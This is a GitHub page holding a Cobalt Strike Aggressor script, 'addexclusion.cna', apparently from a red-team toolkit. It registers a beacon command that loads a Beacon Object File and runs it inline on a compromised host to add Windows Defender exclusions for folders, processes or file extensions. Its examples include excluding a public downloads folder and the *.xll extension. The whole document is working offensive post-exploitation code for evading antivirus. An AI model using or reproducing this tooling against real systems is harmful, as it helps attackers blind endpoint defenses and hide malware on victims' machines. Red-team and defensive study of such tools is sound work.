-
Notifications
You must be signed in to change notification settings - Fork 79
/
addexclusion.cna
46 lines (34 loc) · 1.64 KB
/
addexclusion.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# author REDMED-X
beacon_command_register(
"addexclusion", "Add a new exclusion to Windows Defender for a folder, file, process or extension.",
"INFO:\nAdd a new exclusion to Windows Defender for a folder, file, process or extension.\n\n" .
"ARGUMENTS:\n[<exclusion type>]: specify one of the following exclusion types: path (file/folder), process, extension.\n[<exclusion data>]: specify the data to add as an exclusion.\n\n" .
"USAGE:\naddexclusion <exclusion type> <exclusion data>\n\n" .
"EXAMPLES:\naddexclusion path C:\\Users\\Public\\Downloads\naddexclusion process C:\\Windows\\System32\\example.exe\naddexclusion extension *.xll\n\n");
alias addexclusion {
$bid = $1;
$excltype = $2;
$excldata = $3;
if ($excltype eq "") {
berror($bid, "Please specify one of the following extension types: path | process | extension.\n");
return;
}
if ($excltype eq "path" || $excltype eq "process" || $excltype eq "extension") {
if ($excldata eq "") {
berror($bid, "Please specify the data to add as an exclusion.\n");
return;
}
}
else {
berror($bid, "This exclusion type isn't supported. Please specify one of the following options: path | process | extension.\n");
return;
}
# Read in the right BOF file
$handle = openf(script_resource("addexclusion.o"));
$data = readb($handle, -1);
closef($handle);
# Pack our arguments
$arg_data = bof_pack($bid, "zZ", $excltype, $excldata);
blog($bid, "Tasked to add a new exclusion..");
beacon_inline_execute($bid, $data, "go", $arg_data);
}